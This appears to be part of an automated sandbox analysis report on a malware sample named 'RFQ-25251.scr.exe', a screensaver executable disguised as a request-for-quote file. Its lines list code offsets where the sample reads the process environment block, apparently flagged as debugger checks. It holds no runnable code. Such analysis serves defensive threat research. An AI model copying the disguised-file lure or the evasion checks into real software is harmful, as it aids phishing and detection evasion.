                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E420 mov eax, dword ptr fs:[00000030h]7_2_0126E420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6420 mov eax, dword ptr fs:[00000030h]7_2_012F6420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA430 mov eax, dword ptr fs:[00000030h]7_2_012AA430
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A8402 mov eax, dword ptr fs:[00000030h]7_2_012A8402
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A8402 mov eax, dword ptr fs:[00000030h]7_2_012A8402
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A8402 mov eax, dword ptr fs:[00000030h]7_2_012A8402
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FC460 mov ecx, dword ptr fs:[00000030h]7_2_012FC460
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129A470 mov eax, dword ptr fs:[00000030h]7_2_0129A470
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129A470 mov eax, dword ptr fs:[00000030h]7_2_0129A470
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129A470 mov eax, dword ptr fs:[00000030h]7_2_0129A470
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132A456 mov eax, dword ptr fs:[00000030h]7_2_0132A456
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE443 mov eax, dword ptr fs:[00000030h]7_2_012AE443
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129245A mov eax, dword ptr fs:[00000030h]7_2_0129245A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126645D mov eax, dword ptr fs:[00000030h]7_2_0126645D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012764AB mov eax, dword ptr fs:[00000030h]7_2_012764AB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A44B0 mov ecx, dword ptr fs:[00000030h]7_2_012A44B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FA4B0 mov eax, dword ptr fs:[00000030h]7_2_012FA4B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132A49A mov eax, dword ptr fs:[00000030h]7_2_0132A49A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012704E5 mov ecx, dword ptr fs:[00000030h]7_2_012704E5
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC720 mov eax, dword ptr fs:[00000030h]7_2_012AC720
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC720 mov eax, dword ptr fs:[00000030h]7_2_012AC720
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A273C mov eax, dword ptr fs:[00000030h]7_2_012A273C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A273C mov ecx, dword ptr fs:[00000030h]7_2_012A273C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A273C mov eax, dword ptr fs:[00000030h]7_2_012A273C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EC730 mov eax, dword ptr fs:[00000030h]7_2_012EC730
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC700 mov eax, dword ptr fs:[00000030h]7_2_012AC700
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270710 mov eax, dword ptr fs:[00000030h]7_2_01270710
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A0710 mov eax, dword ptr fs:[00000030h]7_2_012A0710
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278770 mov eax, dword ptr fs:[00000030h]7_2_01278770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280770 mov eax, dword ptr fs:[00000030h]7_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A674D mov esi, dword ptr fs:[00000030h]7_2_012A674D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A674D mov eax, dword ptr fs:[00000030h]7_2_012A674D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A674D mov eax, dword ptr fs:[00000030h]7_2_012A674D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FE75D mov eax, dword ptr fs:[00000030h]7_2_012FE75D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270750 mov eax, dword ptr fs:[00000030h]7_2_01270750
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F4755 mov eax, dword ptr fs:[00000030h]7_2_012F4755
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2750 mov eax, dword ptr fs:[00000030h]7_2_012B2750
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2750 mov eax, dword ptr fs:[00000030h]7_2_012B2750
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012707AF mov eax, dword ptr fs:[00000030h]7_2_012707AF
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013247A0 mov eax, dword ptr fs:[00000030h]7_2_013247A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131678E mov eax, dword ptr fs:[00000030h]7_2_0131678E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012927ED mov eax, dword ptr fs:[00000030h]7_2_012927ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012927ED mov eax, dword ptr fs:[00000030h]7_2_012927ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012927ED mov eax, dword ptr fs:[00000030h]7_2_012927ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FE7E1 mov eax, dword ptr fs:[00000030h]7_2_012FE7E1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012747FB mov eax, dword ptr fs:[00000030h]7_2_012747FB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012747FB mov eax, dword ptr fs:[00000030h]7_2_012747FB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127C7C0 mov eax, dword ptr fs:[00000030h]7_2_0127C7C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F07C3 mov eax, dword ptr fs:[00000030h]7_2_012F07C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A6620 mov eax, dword ptr fs:[00000030h]7_2_012A6620
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A8620 mov eax, dword ptr fs:[00000030h]7_2_012A8620
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127262C mov eax, dword ptr fs:[00000030h]7_2_0127262C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E627 mov eax, dword ptr fs:[00000030h]7_2_0128E627
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128260B mov eax, dword ptr fs:[00000030h]7_2_0128260B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE609 mov eax, dword ptr fs:[00000030h]7_2_012EE609
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2619 mov eax, dword ptr fs:[00000030h]7_2_012B2619
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA660 mov eax, dword ptr fs:[00000030h]7_2_012AA660
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA660 mov eax, dword ptr fs:[00000030h]7_2_012AA660
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133866E mov eax, dword ptr fs:[00000030h]7_2_0133866E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133866E mov eax, dword ptr fs:[00000030h]7_2_0133866E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A2674 mov eax, dword ptr fs:[00000030h]7_2_012A2674
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128C640 mov eax, dword ptr fs:[00000030h]7_2_0128C640
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC6A6 mov eax, dword ptr fs:[00000030h]7_2_012AC6A6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A66B0 mov eax, dword ptr fs:[00000030h]7_2_012A66B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274690 mov eax, dword ptr fs:[00000030h]7_2_01274690
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274690 mov eax, dword ptr fs:[00000030h]7_2_01274690
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE6F2 mov eax, dword ptr fs:[00000030h]7_2_012EE6F2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE6F2 mov eax, dword ptr fs:[00000030h]7_2_012EE6F2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE6F2 mov eax, dword ptr fs:[00000030h]7_2_012EE6F2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE6F2 mov eax, dword ptr fs:[00000030h]7_2_012EE6F2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F06F1 mov eax, dword ptr fs:[00000030h]7_2_012F06F1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F06F1 mov eax, dword ptr fs:[00000030h]7_2_012F06F1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA6C7 mov ebx, dword ptr fs:[00000030h]7_2_012AA6C7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA6C7 mov eax, dword ptr fs:[00000030h]7_2_012AA6C7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F892A mov eax, dword ptr fs:[00000030h]7_2_012F892A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0130892B mov eax, dword ptr fs:[00000030h]7_2_0130892B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE908 mov eax, dword ptr fs:[00000030h]7_2_012EE908
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE908 mov eax, dword ptr fs:[00000030h]7_2_012EE908
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FC912 mov eax, dword ptr fs:[00000030h]7_2_012FC912
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268918 mov eax, dword ptr fs:[00000030h]7_2_01268918
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268918 mov eax, dword ptr fs:[00000030h]7_2_01268918
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B096E mov eax, dword ptr fs:[00000030h]7_2_012B096E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B096E mov edx, dword ptr fs:[00000030h]7_2_012B096E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B096E mov eax, dword ptr fs:[00000030h]7_2_012B096E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01314978 mov eax, dword ptr fs:[00000030h]7_2_01314978
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01314978 mov eax, dword ptr fs:[00000030h]7_2_01314978
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01296962 mov eax, dword ptr fs:[00000030h]7_2_01296962
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01296962 mov eax, dword ptr fs:[00000030h]7_2_01296962
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01296962 mov eax, dword ptr fs:[00000030h]7_2_01296962
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FC97C mov eax, dword ptr fs:[00000030h]7_2_012FC97C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F0946 mov eax, dword ptr fs:[00000030h]7_2_012F0946
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344940 mov eax, dword ptr fs:[00000030h]7_2_01344940
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A0 mov eax, dword ptr fs:[00000030h]7_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012709AD mov eax, dword ptr fs:[00000030h]7_2_012709AD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012709AD mov eax, dword ptr fs:[00000030h]7_2_012709AD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F89B3 mov esi, dword ptr fs:[00000030h]7_2_012F89B3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F89B3 mov eax, dword ptr fs:[00000030h]7_2_012F89B3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F89B3 mov eax, dword ptr fs:[00000030h]7_2_012F89B3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FE9E0 mov eax, dword ptr fs:[00000030h]7_2_012FE9E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A29F9 mov eax, dword ptr fs:[00000030h]7_2_012A29F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A29F9 mov eax, dword ptr fs:[00000030h]7_2_012A29F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133A9D3 mov eax, dword ptr fs:[00000030h]7_2_0133A9D3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013069C0 mov eax, dword ptr fs:[00000030h]7_2_013069C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A9D0 mov eax, dword ptr fs:[00000030h]7_2_0127A9D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A49D0 mov eax, dword ptr fs:[00000030h]7_2_012A49D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131483A mov eax, dword ptr fs:[00000030h]7_2_0131483A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131483A mov eax, dword ptr fs:[00000030h]7_2_0131483A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA830 mov eax, dword ptr fs:[00000030h]7_2_012AA830
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov eax, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov eax, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov eax, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov ecx, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov eax, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292835 mov eax, dword ptr fs:[00000030h]7_2_01292835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FC810 mov eax, dword ptr fs:[00000030h]7_2_012FC810
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306870 mov eax, dword ptr fs:[00000030h]7_2_01306870
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306870 mov eax, dword ptr fs:[00000030h]7_2_01306870
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FE872 mov eax, dword ptr fs:[00000030h]7_2_012FE872
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FE872 mov eax, dword ptr fs:[00000030h]7_2_012FE872
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01282840 mov ecx, dword ptr fs:[00000030h]7_2_01282840
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274859 mov eax, dword ptr fs:[00000030h]7_2_01274859
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274859 mov eax, dword ptr fs:[00000030h]7_2_01274859
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A0854 mov eax, dword ptr fs:[00000030h]7_2_012A0854
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270887 mov eax, dword ptr fs:[00000030h]7_2_01270887
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FC89D mov eax, dword ptr fs:[00000030h]7_2_012FC89D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC8F9 mov eax, dword ptr fs:[00000030h]7_2_012AC8F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC8F9 mov eax, dword ptr fs:[00000030h]7_2_012AC8F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133A8E4 mov eax, dword ptr fs:[00000030h]7_2_0133A8E4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E8C0 mov eax, dword ptr fs:[00000030h]7_2_0129E8C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013408C0 mov eax, dword ptr fs:[00000030h]7_2_013408C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129EB20 mov eax, dword ptr fs:[00000030h]7_2_0129EB20
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129EB20 mov eax, dword ptr fs:[00000030h]7_2_0129EB20
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01338B28 mov eax, dword ptr fs:[00000030h]7_2_01338B28
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01338B28 mov eax, dword ptr fs:[00000030h]7_2_01338B28
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EEB1D mov eax, dword ptr fs:[00000030h]7_2_012EEB1D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344B00 mov eax, dword ptr fs:[00000030h]7_2_01344B00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126CB7E mov eax, dword ptr fs:[00000030h]7_2_0126CB7E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131EB50 mov eax, dword ptr fs:[00000030h]7_2_0131EB50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01342B57 mov eax, dword ptr fs:[00000030h]7_2_01342B57
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01342B57 mov eax, dword ptr fs:[00000030h]7_2_01342B57
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01342B57 mov eax, dword ptr fs:[00000030h]7_2_01342B57
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01342B57 mov eax, dword ptr fs:[00000030h]7_2_01342B57
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306B40 mov eax, dword ptr fs:[00000030h]7_2_01306B40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306B40 mov eax, dword ptr fs:[00000030h]7_2_01306B40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01318B42 mov eax, dword ptr fs:[00000030h]7_2_01318B42
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133AB40 mov eax, dword ptr fs:[00000030h]7_2_0133AB40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268B50 mov eax, dword ptr fs:[00000030h]7_2_01268B50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01324B4B mov eax, dword ptr fs:[00000030h]7_2_01324B4B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01324B4B mov eax, dword ptr fs:[00000030h]7_2_01324B4B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01324BB0 mov eax, dword ptr fs:[00000030h]7_2_01324BB0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01324BB0 mov eax, dword ptr fs:[00000030h]7_2_01324BB0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280BBE mov eax, dword ptr fs:[00000030h]7_2_01280BBE
